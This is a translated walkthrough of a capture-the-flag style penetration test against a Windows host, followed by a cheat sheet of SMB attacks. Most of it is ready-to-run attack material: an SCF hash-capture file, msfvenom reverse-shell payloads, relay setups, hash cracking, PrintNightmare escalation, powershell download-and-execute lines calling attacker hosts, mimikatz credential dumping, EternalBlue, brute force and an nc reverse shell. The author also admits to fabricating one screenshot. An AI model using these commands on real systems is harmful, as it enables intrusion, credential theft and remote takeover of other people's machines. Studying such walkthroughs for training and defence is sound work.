foreword
This infiltration takes the SCF file attack of SMB sharing as a breakthrough point, using burp code to blast Basic Authorization authentication, various methods of smb connection, methods of cracking NTLM value of windows users, application of evil-winrm, windows host information collection tools, msf Running powershell scripts, running powershell scripts remotely, PrintNightmare vulnerability escalation and other knowledge points.
This infiltration process is not very difficult from a technical perspective. The essence of this article is that a number of knowledge points are used in the infiltration process, and a variety of methods of using SMB attacks are summarized. Let’s start the actual infiltration journey .
collect message
First do a basic port scan;
When I saw port 445, I thought of various ways to use smb; when I saw 5985, I thought that I might use evil-winrm; then I focused on port 445;
nmap -A --script smb-vuln* -p 445 10.10.11.106
No direct breakthrough has been found, so we still start from the web.
"Hacker & Network Security Introductory & Advanced Learning Resource Pack" Free Sharing
smb anonymous login
Try a wave of smb anonymous login to see if there are shared files, which can be used as a clue for breakthrough;
Commonly used commands are summarized as follows:
smbmap -H 10.10.11.106
smbclient -N -L //10.10.11.106
enum4linux -a 10.10.11.106
Burp encoding blasting
Open the webpage and pop up the Basic Authorization authentication
Capture packets for blasting;
The red line should be set 3 times, respectively: 1, admin 2,: 3, password
Using a weak password dictionary, ran out of results;
admin: admin
SCF file attack on SMB sharing
Log in to the background and find a place where files can be uploaded;
After many attempts, the SCF file attack can be used to infiltrate. Here are 3 ways to use it:
SMB Attacks via NTLM Trapping
Rationale: SCF (Shell Command File) files can be used to perform a limited set of operations, an SCF file can be used to access a specific UNC path, allowing penetration testers to construct attacks. The code below can be placed in a text file which then needs to be implanted on a network share.
[Shell]Command=2
IconFile=\\10.10.16.4\share\hack.ico
[Taskbar]
Command=ToggleDesktop
Save the hack.txt file as an SCF file, adding the @ symbol in front of the file name will put hack.scf at the top of the shared drive file list. (@hack.scf) and set the receive method;
Responder needs to be executed with the following parameters to capture the hash of the user browsing the share.
responder -wrf -I tun0
When a user browses a share, a network connection is automatically established from the system to the UNC path contained in the SCF file. Windows will attempt to authenticate to the share using a username and password. During authentication, a random 8-byte challenge key is sent from the server to the client, and the hashed NTLM/LANMAN password is encrypted again with this challenge key. Responder will capture NTLMv2 hashes.
In addition to Responder, MSF also has a module that can be used to capture challenge-response password hashes from SMB clients.
auxiliary/server/capture/smb
Upload the previous hack.scf to trigger, and get the user's NTLM value.
Get the shell directly
Use the MSF framework to realize the attack.
exploit/windows/smb/smb_relay
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.16.4
set smbhost 192.168.0.100
set srvport 8080
exploit
Upload the previous hack.scf to trigger, but this method failed in this penetration test.
Upload payload to get shell
The main advantage of this method is that it does not require any interaction with the user and automatically forces the user to connect to the share without negotiating the NTLMv2 hash. Therefore, it is also possible to combine this technique with SMB relay, which will provide a payload that can retrieve a Meterpreter Shell from every user accessing the share.
MSFVenom can be used to generate payloads that will be executed on the target:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.171 LPORT=5555 -f exe > hack.exe
The smbrelayx python script in Impacket can be used to setup a relay attack and deliver the payload when the target host tries to connect to the SMB server. This will be done automatically because the SCF file will force each user to use their own credentials to connect to a non-existent share.
./smbrelayx.py -h Target-IP -e ./hack.exe
At the same time, use MSF to set the connection back end of the Trojan horse:
exploit/multi/handler
The module needs to be configured with the same parameters as the generated payload.
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.171
set LPORT 5555
exploit
When a user browses a share, the SMB server will receive the connection and will use the username and password hash to authenticate with his system and execute the payload as a writable share. In this penetration test, the method failed.
After obtaining the NTLM value, the next step is to try to crack it.
LM NTLM NET-NTLM2 Crack
The Windows system password hash is generally composed of two parts by default: the first part is LM Hash, and the second part is NT Hash
LM
Windows Vista / Server 2008 has been disabled by default, and it can be encountered in older versions, but according to the backward compatibility of windwos, it can be enabled through group policies.
Example: 299BD128C1101FD6
hash cracking:
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
NThash
NTLM is how passwords are stored on Windows systems these days and can be obtained by dumping the SAM database or using Mimikatz.
Example:
B4B9B02E6F09A9BD760F388B67351E2B
hash cracking:
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
NTLMV1
The NTLM protocol uses NTHash in the challenge/response between server and client, v1 of the protocol uses both NT and LM hashes, depending on configuration and what is available.
Example:
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
hash cracking:
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
NTLMV2
This is a new and improved version of the NTLM protocol, which makes it very difficult to crack. The concept is the same as NTLMv1, but the algorithm and response sent to the server are different, starting from Windows 2000, which is the default value in Windows.
Example:
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
hash cracking:
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt
NTLMV2 was used in this infiltration;
hashcat -m 5600 -a 3 123.txt --wordlist top100.txt
john --format=netntlmv2 123.txt -w=top100.txt
Successfully obtained username and password: tony:liltony
According to the open ports 445 and 5985, connect a wave;
Attempt to psexec connection failed;
[External link picture transfer failed, the source site may have an anti-theft link mechanism, it is recommended to save the picture and upload it directly (
img-pB7Ofv13-1635337682265)(https://upload-images.jianshu.io/upload_images/26472780-ac960ef4943dcd51.png ?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
evil-winrm -i 10.10.11.106 -u tony -p liltony
The connection is successful, and the next step is to find a way to escalate the privilege.
smb login with username and password
Using the obtained username and password, try to log in to the smb share again;
[External link picture transfer failed, the source site may have an anti-theft link mechanism, it is recommended to save the picture and upload it directly (
img-WjhLPGxj-1635337682278)(https://upload-images.jianshu.io/upload_images/26472780-d7ed45ca1d8f9f6a.png ?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)]
Escalation of rights
Host Information Collection
Try to use the command, the result does not have permission to execute;
Then use a script to run, the commonly used one is winPEASx64.exe or winPEAS.bat, there is a small hole here, you need to add a backslash when the program is running;
There were many results, and finally found the print spooler service service;
Exploit the recent WINDOWS PRINT SPOOLER remote code execution vulnerability (CVE-2021-1675) to escalate privileges.
https://github.com/calebstewart/CVE-2021-1675
The test found that importing the powershell script directly will report an error;
The following two methods are used respectively;
msf load powershell
Generate a Trojan
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.4 LPORT=7777 -f exe > hack.exe
receive bounce;
Use evil-winrm to upload hack.exe, run;
The program will report an error and the session will be interrupted. Migrate the process and try again;
It is necessary to upload the ps1 script to the corresponding location of the host in advance, otherwise the script cannot be found;!
This time, the script was successfully executed, and a new user was added with administrator privileges. You can also try a wave of remote running ps scripts.
Run powershell script remotely
Remotely download files to local and execute
cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('http://127.0.0.1:8089','notepad.exe');start-process notepad.exe
Execute ps1 script remotely
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
Build your own http server
Run the ps script remotely;
IEX(New-Object Net.Webclient).downloadstring('http://10.10.16.4:8000/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "hack123" -NewPassword "hack123"
Try to grab the password;
./mimikatz.exe privilege::debug "sekurlsa::logonpasswords" exit
So far, the host has been successfully taken down, and the following egg link will summarize several other common attack methods of smb.
smb attack method
Versions of Windows SMB
CIFS: An older version of SMB that was included in Microsoft Windows NT 4.0 in 1996.
SMB 1.0 / SMB1: The version used in Windows 2000, Windows XP, Windows Server 2003, and Windows Server 2003 R2.
SMB 2.0 / SMB2: This version is for Windows Vista and Windows Server 2008.
SMB 2.1 / SMB2.1: This version is for Windows 7 and Windows Server 2008 R2.
SMB 3.0 / SMB3: This version is for Windows 8 and Windows Server 2012.
SMB 3.02 / SMB3: This version is for Windows 8.1 and Windows Server 2012 R2.
SMB 3.1: This version is for Windows Server 2016 and Windows 10.
Currently, the latest version of SMB is SMB 3.1.1, which was introduced in Windows 10 and Windows Server 2016. This release supports AES 128 GCM encryption and uses SHA-512 hashing in addition to the AES 128 CCM encryption added in SMB3. SMB 3.1.1 also enforces security negotiation when connecting to clients using SMB 2.x and later.
eternal blue
We run the following MSF module, which will exploit the target machine directly.
use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.101
msf exploit(ms17_010_eternalblue) > exploit
brute force
hydra -L user.txt -P pass.txt 192.168.1.101 smb
-L --> 表示用户名列表
-P --> 表示密码
If the crack is successful, users on the system can be enumerated;
use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(smb_enumusers) > set rhosts 192.168.1.101
msf auxiliary(smb_enumusers) > set smbuser raj
msf auxiliary(smb_enumusers) > set smbpass 123
msf auxiliary(smb_enumusers) > exploit
Test it;
PSexec connect SMB
You can use the modules in msf;
use exploit/windows/smb/psexec
msf exploit windows/smb/psexec) > set rhost 192.168.1.101
msf exploit(windows/smb/psexec) > set smbuser raj
msf exploit(windows/smb/psexec) > set smbpass 123
msf exploit(windows/smb/psexec) > exploit
Because this infiltration was unsuccessful, I made up the previous picture;
You can also use psexec.py in Impacket
#Connect with plaintext password
./psexec.py xie/administrator:[email protected]
# join with hash value
./psexec.py xie/[email protected] -hashes AADA8EDA23213C025AE50F5CD5697D9F:6542D35ED5FF6AE5E75B875068C5D3BC
You can also use the psexec.exe program directly;
Rundll32 One-liner
Launch Rundll32 Attack via Metasploit's SMB Delivery
Metasploit also includes an "SMB Delivery" module that generates malicious dll files. This module serves payloads via an SMB server and provides commands to retrieve and execute generated payloads. Currently DLL and Powershell are supported.
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit
This will generate a link to the malicious DLL file, now send this link to your target and wait for his action.
Once the victim runs the malicious code inside the Run Prompt or Command Prompt, we get a Meterpreter session on Metasploit.
SMB DOS attack
The SMB Dos attack is another of the best methods we have in the Metasploit framework.
This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and force vulnerable clients to access this system's IP as an SMB server. If the target uses Internet Explorer or a Word document, this can be achieved by embedding the UNC path (\HOST\share\something) into the web page.
use auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop
msf auxiliary(ms10_006_negotiate_response_loop) > set srvhost 192.168.1.106
msf auxiliary(ms10_006_negotiate_response_loop) > exploit
Remote file transfer and operation
The file transfer usage is as follows:
Use the smbserver.py in the famous impacket package to transfer files.
The directory is set according to your own smbserver.py share '/root/exp'
Then copy CEH.kdbx \10.10.14.57\Share in the listening shell and successfully receive the file
You can also run programs remotely;
Open the smbsever service in impacket, put ms15-051x64 and nc64.exe into the shared file I specified,
python smbserver.py Share '/root/htb/bastard'
Execute the rebound in the shell;
\\10.10.14.57\share\ms15-051x64.exe "\\10.10.14.57\share\nc64.exe -e cmd 10.10.14.57 443"
In addition, this machine monitors 443. received, done
Summarize
For SCF file attacks, we can also prevent this attack by the following methods:
1. Use Kerbeors authentication or SMB signature;
2. Disable the write permission provided by shared files to unauthenticated users;
3. Make sure you are using an NTLMv2 password and increase the complexity of the password.